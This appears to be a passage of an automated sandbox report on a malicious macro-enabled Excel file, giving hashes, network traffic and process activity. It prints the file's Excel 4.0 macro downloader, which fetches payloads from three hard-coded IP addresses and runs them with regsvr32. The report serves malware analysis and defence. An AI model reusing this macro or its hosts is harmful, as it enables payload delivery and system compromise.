                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4O4:cng4P4346PgZw9gQap
                MD5:85279074A41AD1C9174C9D03F19810B3
                SHA1:C4DBBDABD114B05AA56E8E00F9826B4868E2561F
                SHA-256:A48F6F68FA335FC5F5E84F57EDFEA73F577D234EE34D13810596283484A1633B
                SHA-512:BB369D87F0CBCB16D9B2B0974E1281BF0B8C3E870D7579DD55AB74C5DF7C0837865843F4F0B492AA4C183BBA351C91D1FCF113D689F6C62B642C5195B5393E41
                Malicious:false
                Reputation:low
                C:\Users\user\Desktop\~$Permission-1532161794-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666395274852154
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-1532161794-06252021.xlsm
                File size:153750
                MD5:bff78ca6421651b824c41ff73cd63a4d
                SHA1:8a439fe82292dfb61092daa32af6f0152400f002
                SHA256:b4c8a880fae666add98f9a871210d75f7addd4a00a334fb758c791c5ad1d3711
                SHA512:728a7ba287c987f67b480e07d8d947f784c51516743c17dfd5737eb9f4be958b2526452011418bc97c77fc1ff43f35e9bb6d5835d605b3905c96452392d5f183
                SSDEEP:3072:ymKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:J4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-1532161794-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                =NOW()&H8
                .dat
                =REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)
                ="http://185.240.103.219/"
                =Jerutyg(0,F13&G8,"..\Kro.fis",0,0)
                ="http://190.14.37.3/"
                =Jerutyg(0,F14&G8,"..\Kro.fis1",0,0)
                ="http://185.183.99.120/"
                =Jerutyg(0,F15&G8,"..\Kro.fis2",0,0)
                =RUN(Sheet4!I9)
                =EXEC(Sheet2!O22)
                =EXEC(Sheet2!O22&"1")
                =EXEC(Sheet2!O22&"2")
                =HALT()

                Network Behavior

                Snort IDS Alerts

                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                06/25/21-18:25:14.440139 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 190.14.37.3 | 192.168.2.22
                06/25/21-18:25:14.809690 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 185.183.99.120 | 192.168.2.22

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jun 25, 2021 18:25:10.814660072 CEST | 49165 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:10.901743889 CEST | 80 | 49165 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:11.410449028 CEST | 49165 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:11.499355078 CEST | 80 | 49165 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:12.003333092 CEST | 49165 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:12.093991041 CEST | 80 | 49165 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:12.095508099 CEST | 49166 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:12.185947895 CEST | 80 | 49166 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:12.689728022 CEST | 49166 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:12.781727076 CEST | 80 | 49166 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:13.298177004 CEST | 49166 | 80 | 192.168.2.22 | 185.240.103.219
                Jun 25, 2021 18:25:13.387892008 CEST | 80 | 49166 | 185.240.103.219 | 192.168.2.22
                Jun 25, 2021 18:25:13.424767017 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:25:13.634337902 CEST | 80 | 49167 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:25:13.634708881 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:25:13.636249065 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:25:13.846219063 CEST | 80 | 49167 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:25:14.440139055 CEST | 80 | 49167 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:25:14.440251112 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:25:14.454608917 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:25:14.516675949 CEST | 80 | 49168 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:25:14.516835928 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:25:14.517451048 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:25:14.579385996 CEST | 80 | 49168 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:25:14.809689999 CEST | 80 | 49168 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:25:14.810095072 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:26:19.444881916 CEST | 80 | 49167 | 190.14.37.3 | 192.168.2.22
                Jun 25, 2021 18:26:19.446012974 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:26:19.810117960 CEST | 80 | 49168 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:26:19.810364008 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:27:10.731702089 CEST | 49168 | 80 | 192.168.2.22 | 185.183.99.120
                Jun 25, 2021 18:27:10.732223034 CEST | 49167 | 80 | 192.168.2.22 | 190.14.37.3
                Jun 25, 2021 18:27:10.795295954 CEST | 80 | 49168 | 185.183.99.120 | 192.168.2.22
                Jun 25, 2021 18:27:10.942275047 CEST | 80 | 49167 | 190.14.37.3 | 192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.3
                • 185.183.99.120

                HTTP Packets

                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.22 | 49167 | 190.14.37.3 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Jun 25, 2021 18:25:13.636249065 CEST | 1 | OUT | GET /44372.7671056713.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.3
                Connection: Keep-Alive
                Jun 25, 2021 18:25:14.440139055 CEST | 2 | IN | HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:25:14 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Ascii:
                <html>
                <head><title>403 Forbidden</title></head>
                <body>
                <center><h1>403 Forbidden</h1></center>
                <hr><center>nginx</center>
                </body>
                </html>
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.22 | 49168 | 185.183.99.120 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Timestamp | kBytes transferred | Direction | Data
                Jun 25, 2021 18:25:14.517451048 CEST | 2 | OUT | GET /44372.7671056713.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:25:14.809689999 CEST | 3 | IN | HTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:25:29 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Ascii:
                <html>
                <head><title>403 Forbidden</title></head>
                <body>
                <center><h1>403 Forbidden</h1></center>
                <hr><center>nginx</center>
                </body>
                </html>
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->
                <!-- a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time:18:24:35
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fe00000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:24:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff050000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis
